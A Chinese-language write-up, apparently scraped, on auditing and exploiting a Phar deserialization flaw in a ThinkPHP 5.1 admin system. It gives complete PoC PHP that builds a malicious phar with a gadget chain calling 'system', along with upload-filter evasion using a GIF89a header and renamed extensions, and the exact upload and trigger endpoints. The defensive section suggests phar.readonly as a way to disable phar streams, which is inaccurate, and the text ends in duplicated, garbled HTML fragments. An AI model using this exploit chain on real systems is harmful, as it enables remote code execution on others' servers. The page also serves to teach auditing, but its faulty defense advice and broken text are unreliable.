Phar反序列化漏洞审计与利用详解<\/h1>

一、Phar反序列化基础原理<\/h2>

1. Phar文件简介<\/h3>
Phar(PHP Archive)是PHP的打包文件格式，自PHP 5.3引入，类似于Java的JAR文件。它可以将多个PHP文件、资源等打包成一个.phar文件，PHP可以直接执行其中的代码而无需解压。<\/p>

2. 反序列化漏洞成因<\/h3>
Phar文件会以序列化的形式存储用户自定义的meta-data数据。当PHP使用某些文件系统函数操作Phar文件时，会自动反序列化这些meta-data，如果meta-data中包含恶意构造的序列化数据，就可能触发反序列化漏洞。<\/p>

3. 触发Phar反序列化的文件系统函数<\/h3>

以下是一些常见的可以触发Phar反序列化的PHP文件系统函数：<\/p>

file_exists()<\/code><\/li>
is_file()<\/code><\/li>
is_dir()<\/code><\/li>
file_get_contents()<\/code><\/li>
file_put_contents()<\/code><\/li>
file()<\/code><\/li>
fopen()<\/code><\/li>
unlink()<\/code><\/li>
stat()<\/code><\/li>

readfile()<\/code><\/li>
<\/ul>
二、漏洞审计过程<\/h2>
1. 目标选择<\/h3>
选择使用ThinkPHP 5.1框架的系统，因为：<\/p>

该框架有公开的反序列化利用链<\/li>
框架广泛使用，目标系统较多<\/li>
<\/ul>
2. 审计方法<\/h3>
全局搜索可能触发Phar反序列化的函数调用，特别是参数可控的情况：<\/p>
grep -r "is_file\|is_dir\|file_exists"<\/span> \/path\/to\/code
<\/span><\/span><\/code><\/pre>3. 发现漏洞点<\/h3>
在\/application\/admin\/controller\/Database.php<\/code>中发现is_dir()<\/code>调用，参数可控：<\/p>
\/\/ 数据库备份路径判断
<\/span><\/span><\/span><\/span>if<\/span> (!<\/span>is_dir<\/span>($backupPath)) {
<\/span><\/span>    \/\/ ...
<\/span><\/span><\/span><\/span>}
<\/span><\/span><\/code><\/pre>4. 利用条件<\/h3>
需要满足两个条件：<\/p>

能够上传恶意Phar文件到服务器<\/li>
能够控制is_dir()<\/code>的参数指向该Phar文件<\/li>
<\/ol>
三、漏洞利用步骤<\/h2>
1. 构造恶意Phar文件<\/h3>
使用以下PoC生成Phar文件：<\/p>
<?<\/span>php<\/span>
<\/span><\/span>namespace<\/span> think\process\pipes<\/span> {
<\/span><\/span>    class<\/span> Windows<\/span> {
<\/span><\/span>        private<\/span> $files;
<\/span><\/span>        public<\/span> function<\/span> __construct($files) {
<\/span><\/span>            $this-><\/span>files<\/span> =<\/span> [$files];
<\/span><\/span>        }
<\/span><\/span>    }
<\/span><\/span>}
<\/span><\/span>
<\/span><\/span>namespace<\/span> think\model\concern<\/span> {
<\/span><\/span>    trait<\/span> Conversion<\/span> {}
<\/span><\/span>    trait<\/span> Attribute<\/span> {
<\/span><\/span>        private<\/span> $data;
<\/span><\/span>        private<\/span> $withAttr =<\/span> ["lin"<\/span> =><\/span> "system"<\/span>];
<\/span><\/span>        public<\/span> function<\/span> get<\/span>() {
<\/span><\/span>            $this-><\/span>data<\/span> =<\/span> ["lin"<\/span> =><\/span> "dir"<\/span>];
<\/span><\/span>        }
<\/span><\/span>    }
<\/span><\/span>}
<\/span><\/span>
<\/span><\/span>namespace<\/span> think<\/span> {
<\/span><\/span>    abstract<\/span> class<\/span> Model<\/span> {
<\/span><\/span>        use<\/span> model\concern\Attribute<\/span>;
<\/span><\/span>        use<\/span> model\concern\Conversion<\/span>;
<\/span><\/span>    }
<\/span><\/span>}
<\/span><\/span>
<\/span><\/span>namespace<\/span> think\model<\/span> {
<\/span><\/span>    use<\/span> think\Model<\/span>;
<\/span><\/span>    class<\/span> Pivot<\/span> extends<\/span> Model<\/span> {
<\/span><\/span>        public<\/span> function<\/span> __construct() {
<\/span><\/span>            $this-><\/span>get<\/span>();
<\/span><\/span>        }
<\/span><\/span>    }
<\/span><\/span>}
<\/span><\/span>
<\/span><\/span>namespace<\/span> {
<\/span><\/span>    $conver =<\/span> new<\/span> think\model\Pivot<\/span>();
<\/span><\/span>    $payload =<\/span> new<\/span> think\process\pipes\Windows<\/span>($conver);
<\/span><\/span>    
<\/span><\/span>    @<\/span>unlink<\/span>("phar.phar"<\/span>);
<\/span><\/span>    $phar =<\/span> new<\/span> Phar<\/span>("phar.phar"<\/span>);
<\/span><\/span>    $phar-><\/span>startBuffering<\/span>();
<\/span><\/span>    $phar-><\/span>setStub<\/span>('GIF89a'<\/span> .<\/span> "<?php __HALT_COMPILER(); ?>"<\/span>);
<\/span><\/span>    $phar-><\/span>setMetadata<\/span>($payload);
<\/span><\/span>    $phar-><\/span>addFromString<\/span>("test.txt"<\/span>, "test"<\/span>);
<\/span><\/span>    $phar-><\/span>stopBuffering<\/span>();
<\/span><\/span>    
<\/span><\/span>    echo<\/span> urlencode<\/span>(serialize<\/span>($payload));
<\/span><\/span>}
<\/span><\/span>?><\/span>
<\/span><\/span><\/span><\/code><\/pre>2. 绕过上传限制<\/h3>
由于系统对上传文件有MIME类型和后缀名限制，需要对Phar文件进行伪装：<\/p>

添加任意文件头（如GIF89a）<\/li>
修改文件后缀为允许的类型（如.zip、.docx等）<\/li>
<\/ol>
3. 上传恶意文件<\/h3>
发现两种上传方式：<\/p>

直接上传接口（失败）：<\/li>
<\/ol>
POST \/admin.php\/admin\/attachment\/upload\/dir\/images\/module\/admin.html
<\/code><\/pre>
失败原因：当dir=images时会调用图像校验函数<\/p>

UEditor上传接口（成功）：<\/li>
<\/ol>
POST \/admin.php\/admin\/attachment\/upload\/dir\/files\/module\/admin.html
<\/code><\/pre>
将dir参数改为files，并上传伪装后的Phar文件<\/p>
4. 设置数据库备份路径<\/h3>
在后台系统设置中，将数据库备份路径设置为上传的恶意文件路径：<\/p>
系统设置 → 数据库 → 数据库备份根路径
<\/code><\/pre>
5. 触发漏洞<\/h3>
访问调用is_dir()<\/code>函数的页面触发漏洞：<\/p>
GET \/admin.php\/admin\/database\/index\/group\/import.html
<\/code><\/pre>
四、防御措施<\/h2>
1. 开发者防御<\/h3>

禁用Phar流：
ini_set<\/span>('phar.readonly'<\/span>, 1<\/span>);
<\/span><\/span><\/code><\/pre><\/li>
对文件系统函数参数进行严格过滤<\/li>
使用realpath()<\/code>解析路径，避免目录穿越<\/li>
更新框架版本，使用修复后的ThinkPHP<\/li>
<\/ol>
2. 管理员防御<\/h3>

限制后台访问IP<\/li>
禁用不必要的文件上传功能<\/li>
定期更新系统补丁<\/li>
<\/ol>
五、总结<\/h2>
Phar反序列化漏洞利用需要满足以下条件：<\/p>

存在可触发Phar反序列化的文件操作函数<\/li>
参数可控且未进行严格过滤<\/li>
能够上传恶意Phar文件到服务器<\/li>
有可用的反序列化利用链<\/li>
<\/ol>
通过本文的审计过程可以看出，即使系统有上传限制，通过适当的伪装仍然可能绕过防御。因此，安全防护需要多层次、多角度的综合措施。<\/p>

Phar反序列化漏洞审计与利用详解<\/h1>

一、Phar反序列化基础原理<\/h2>

1. Phar文件简介<\/h3> Phar(PHP Archive)是PHP的打包文件格式，自PHP 5.3引入，类似于Java的JAR文件。它可以将多个PHP文件、资源等打包成一个.phar文件，PHP可以直接执行其中的代码而无需解压。<\/p>

二、漏洞审计过程<\/h2>

三、漏洞利用步骤<\/h2>

四、防御措施<\/h2>

1. Phar文件简介<\/h3>
Phar(PHP Archive)是PHP的打包文件格式，自PHP 5.3引入，类似于Java的JAR文件。它可以将多个PHP文件、资源等打包成一个.phar文件，PHP可以直接执行其中的代码而无需解压。<\/p>